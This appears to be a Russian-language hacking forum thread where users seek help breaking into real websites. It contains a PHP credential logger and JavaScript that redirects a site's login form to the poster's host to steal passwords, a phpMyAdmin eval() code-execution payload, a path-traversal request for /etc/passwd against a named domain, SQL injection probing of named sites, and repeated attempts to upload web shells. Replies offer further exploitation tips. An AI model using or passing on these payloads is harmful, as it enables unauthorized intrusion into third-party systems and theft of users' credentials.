Ваши вопросы по уязвимостям.

Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог
python sqlmap.py - g

 

ocheretko, Сервер банит IP. О таком надо предупреждать.

 

можно вопрос нашел уязвимый сайт , там blind sql injection
он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10
current user is dba :true (база оракле)
пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle)
чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )

 

Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php

Code:

<?
$login = $_POST['username'];
$pass = $_POST['password'];
$file = "log.txt";
$fop = fopen("$file","a+");
fwrite($fop,"$login;$pass\n");
fclose($fop);
?>

Вот сам submit

<form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes" onsubmit="return lsSubmit();">

И так обращяюсь к submit.
document.getElementById('lsform').action="http://мойхост.ru/base.php?";

 

Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();
Сплоит не работает , ответ
SQL-запрос:

SELECT `information_schema`.`SCHEMATA` . *
FROM `information_schema`.`SCHEMATA`
GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`
ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC

Ответ MySQL:
#1054 - Unknown column '"]) OR eval($_REQUEST[cmd]); //' in 'order clause'
как раскрутить помогите и сильно не ругайте я только начинаю.

 

Как выглядит XSS и где она?

Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.

 

Мне нужно залить шелл на сайт.. В PMA Нет привилегий..

 

Code:

http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd

Подскажите как можно обойти.

 

Code:

http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php

404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали

 

Что то есть?

Code:

http://riot.mail.ru/info/news/index.php?show=dat&date=12082015'

 

Что можно с этого поиметь...

• exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u54jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u54jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main}
• There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page.

 

Есть сайт на Drupal в загрузку картинок заливаю shell.php%00ipg заливается.Пробовал ище в коментах exif мини-шелл прописать. Но меняет имя файла, иду по адресу файла открываю и ничего не происходит.
Как я понял стоит imagecache drupal можна вообще таким способом залить шелл или мини-шелл?
Ище фильтрация на сайте
Emphasized <em>Emphasized</em> Emphasized
Strong <strong>Strong</strong> Strong
Cited <cite>Cited</cite> Cited
Coded text used to show programming source code <code>Coded</code> Coded
Character Description You Type You Get
Ampersand &amp; &
Greater than &gt; >
Less than &lt; <
Quotation mark &quot; "

 

Не получается залить шелл .
Вообщем есть админка на сайте.Админка самописная.
Картинки можно заливать .jpg .png .gif ,остальные расширения нельзя, выдаёт ошибки которые появляются прямо в самой админке .

Spoiler: Вот ошибки

Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 75

Warning: Division by zero in /home/*******/*******/admin/gdResizer.php on line 227

Warning: Division by zero in /home/*******/*******.ru/admin/gdResizer.php on line 228

Warning: imagecreatetruecolor(): Invalid image dimensions in /home/*******/*******.ru/admin/gdResizer.php on line 241

Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /home/*******/*******.ru/admin/gdResizer.php on line 250

Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 107

Пытаюсь залить шелл с расширением .jpg или .png или .gif тоже ошибки .
Пробую Shell.php.jpg не катит,даже с %0 .
Пробую через Image Manager,выбираю файл shell.php,пишет файл загружен,но его там нет .
Пробовал даже .htacces залить,и то не помогает .

Есть возможность писать отзывы .
Пишу в строку "Автор" - '(кавычку,одинарную),пишу текст,буква d . Вылезает это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd','2015-08-26 16:58:08')' at line 1 .
А что дальше с SQL делать не знаю . Остальные запросы блокирует . Видимо некоторые символы блокирует .
На заметку : сайт на .html .

Помогите,а то уже нет сил .

 

Есть sql иньекция - раскручивайте. Может быть будут права через базу залить шелл.
Ваш загружаемый файл обрабатывается с помощью библиотеки GD - библиотека php для работы с графическими файлами. Она создает новое корректное изображение с уже существующего. Думаю не получится загрузить другой файл кроме картинки. Просто на сайте нет обработчика ошибок, и включен вывод ошибок
То, что сайт на html ничего не значит. Если Вы получили сообщение об ошибке mysql уже заслуживает внимание и может рассматриваться как потенциальная уязвимость.

P.S. И дай Вам бог сил. В нашей работе - главное терпение

 

Помогите разобраться с OpenCart 1.5.4.1
http://www.slideshare.net/DefconRussia/reutov-yunusov-nagibin-random-numbers-take-ii с страницы 46
как я понял нужно скомпилировать на стр 49
Вообще может есть какая то инфа то OpenCart 1.5.4.1

 

Возможно ли раскрутить Фрагментированную SQL инъекцию
Отсутствие фильтрации символа обратного слэша \
http://fortunae-filius.ru/reg.htm

 

sqmap -m путь в файлу

 

Заливаю Shell WSO через админку .
Shell заливал в /news .
Составил линку http://********.com/upload/news/wso2.php
Вылезает вот это :

 

опробуйте pas

 

Тут pas не поможет, это php расширение интерпретируется как html код, нужно пробывать играться с расширением или путь выше искать...